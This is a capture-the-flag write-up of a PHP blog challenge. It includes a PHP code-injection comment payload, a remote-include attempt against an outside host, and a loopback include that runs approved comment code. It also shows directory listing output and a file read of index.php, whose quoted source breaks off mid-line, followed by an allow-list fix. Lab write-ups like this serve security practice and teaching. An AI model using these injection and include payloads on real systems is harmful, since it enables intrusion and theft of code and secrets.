This challenge has 3 flags, and I've managed to get 2 of them so far:
Flag 0
The "blog post" indicates that the site is powered by PHP. So what happens if we just include some PHP in the comment input box?
<?php echo '<p>Hello World</p>'; ?>
First flag!
Flag 1
Looking at the page source shows a commented out anchor:
<h3>Comments</h3>
<!--<a href="?page=admin.auth.inc">Admin login</a>-->
Loading that path brings up an admin login page. No flag yet, but what if we try just admin.inc? Second flag! And we can approve comments, that's handy!
Flag 2
What are we going to do for the final flag? SQL injection on the login page? XSS in a comment? Maybe we can upload a file and include it? If we can include a remote PHP file, maybe we could host it ourselves and inject some code for the target to execute.
Notice: Undefined variable: title in /app/index.php on line 30
Warning: include(http://4d4ms.com/lee.php): failed to open stream: Connection refused in /app/index.php on line 21
Warning: include(): Failed opening 'http://4d4ms.com/lee.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /app/index.php on line 21
Ok, so I think this server cannot reach outside of its own network for including files via PHP (not to mention the fact it says so in the one "post"):
"This server can't talk to the outside world and nobody but me can upload files, so there's no risk in just using include()."
So is there anything we can include from within the network?
http://{ctf}/?page=http://127.0.0.1/admin.inc
Notice: Undefined variable: title in /app/index.php on line 30
Pending Comments
Warning: mysql_query(): Access denied for user ''@'localhost' (using password: NO) in /app/admin.inc.php on line 5
Warning: mysql_query(): A link to the server could not be established in /app/admin.inc.php on line 5
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /app/admin.inc.php on line 6
Not sure what it's worth, but we know that MySQL is involved and that we can include local files, but we'll need to spend some more time figuring out what to include. Ideally it would be content under our control, so maybe we can post a comment and somehow include it.
Update 04/28/2019: Ok, combining what we've learned about flags 0 and 1, we can write some PHP code as a comment, approve it as admin, and now we need to execute it:
http://{ctf}/?page=http://127.0.0.1/index
will execute the PHP we've written and approved in the comments! But what does this challenge want us to do with that?
- I can echo content, including JavaScript that executes on page load; no flag.
- I can write code to output system commands:
total 104
-rw-r--r-- 1 root root   278 Dec 12 07:43 000-default.conf
-rw-r--r-- 1 root root   372 Dec 12 07:43 Dockerfile
-rw-r--r-- 1 root root   356 Dec 12 07:43 admin.auth.inc.php
-rw-r--r-- 1 root root   495 Dec 12 07:43 admin.inc.php
-rw-r--r-- 1 root root   412 Dec 12 07:43 home.inc.php
-rw-r--r-- 1 root root  1502 Apr 29 03:43 index.php
-rw-r--r-- 1 root root 69889 Dec 12 07:43 php.ini
drwxr-xr-x 2 root root  4096 Dec 12 07:43 posts
-rw-r--r-- 1 root root   154 Dec 12 07:43 setup.sh
Hi
- I can write code to read files, how about we read index.php?
<?php readfile('index.php'); ?>
<?php
// ^FLAG^$FLAG$
mysql_connect("localhost", "root", "");
mysql_select_db("level4");
$page = isset($_GET['page']) ? $_GET['page'] : 'home.inc';
if(strpos($page, ':') !== false && substr($page, 0, 5) !== "http:") $page = "home.inc";
if(isset($_POST['body'])) {
    mysql_query("INSERT INTO comments (page, body, approved) VALUES ('" . mysql_real_escape_string($page) . "', '" . mysql_real_escape_string($_POST['body']) . "', 0)");
    if(strpos($_POST['body'], '<?php') !== false) echo '<p
BINGO! All flags captured!
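For anyone wondering what the fix looks like, here is an added illustration (not the challenge's code and not part of the write-up). It puts the include() filter recovered from index.php next to an allow-list dispatcher: the request value is only ever a key into a fixed map, so nothing from the request reaches include() as a path, and the admin authorization check lives in the dispatcher instead of in a separate login file that a visitor can simply skip (the admin.inc versus admin.auth.inc lesson from flag 1). The file names in the $pages map and the $isAdmin flag are assumptions for the example.

```php
<?php
// Added illustration, not the challenge's code or the write-up author's.
// It contrasts the challenge's include() filter (as recovered from index.php)
// with an allow-list dispatcher. File names and the $pages map are assumed.

// The original filter: the only thing it rejects is a "scheme:" other than
// "http:", so a loopback URL passes, and with allow_url_include on, include()
// fetches the app's own rendered page and runs any PHP tags in approved comments.
function vulnerable_page(array $get): string
{
    $page = isset($get['page']) ? $get['page'] : 'home.inc';
    if (strpos($page, ':') !== false && substr($page, 0, 5) !== "http:") {
        $page = "home.inc";
    }
    return $page . '.php';   // in the challenge this string went straight to include()
}

// Allow-list dispatcher: the request value is only a key into a fixed map, and
// the authorization check happens here, before any file is chosen.
function safe_page(array $get, array $pages, bool $isAdmin): string
{
    $key = isset($get['page']) && is_string($get['page']) ? $get['page'] : 'home';
    if (!array_key_exists($key, $pages)) {
        $key = 'home';                       // unknown key: fall back, never include the input
    }
    if ($pages[$key]['auth'] && !$isAdmin) {
        $key = 'login';                      // protected page without a session: show login
    }
    return $pages[$key]['file'];             // always one of the listed files
}

$pages = [                                   // assumed allow-list for this example
    'home'  => ['file' => __DIR__ . '/home.inc.php',       'auth' => false],
    'login' => ['file' => __DIR__ . '/admin.auth.inc.php', 'auth' => false],
    'admin' => ['file' => __DIR__ . '/admin.inc.php',      'auth' => true],
];

// Constructed requests mirroring the ones in the write-up, run through both versions
// as an anonymous visitor ($isAdmin = false).
foreach (['admin.inc', 'http://127.0.0.1/index', 'admin'] as $p) {
    printf("%-24s original -> %-30s allow-list -> %s\n",
        $p, vulnerable_page(['page' => $p]), safe_page(['page' => $p], $pages, false));
}
```

The dispatcher only makes sure the request never becomes an include() path; the php.ini sitting in that directory listing should still have allow_url_include switched off, because "this server can't talk to the outside world" says nothing about the server talking to itself on 127.0.0.1.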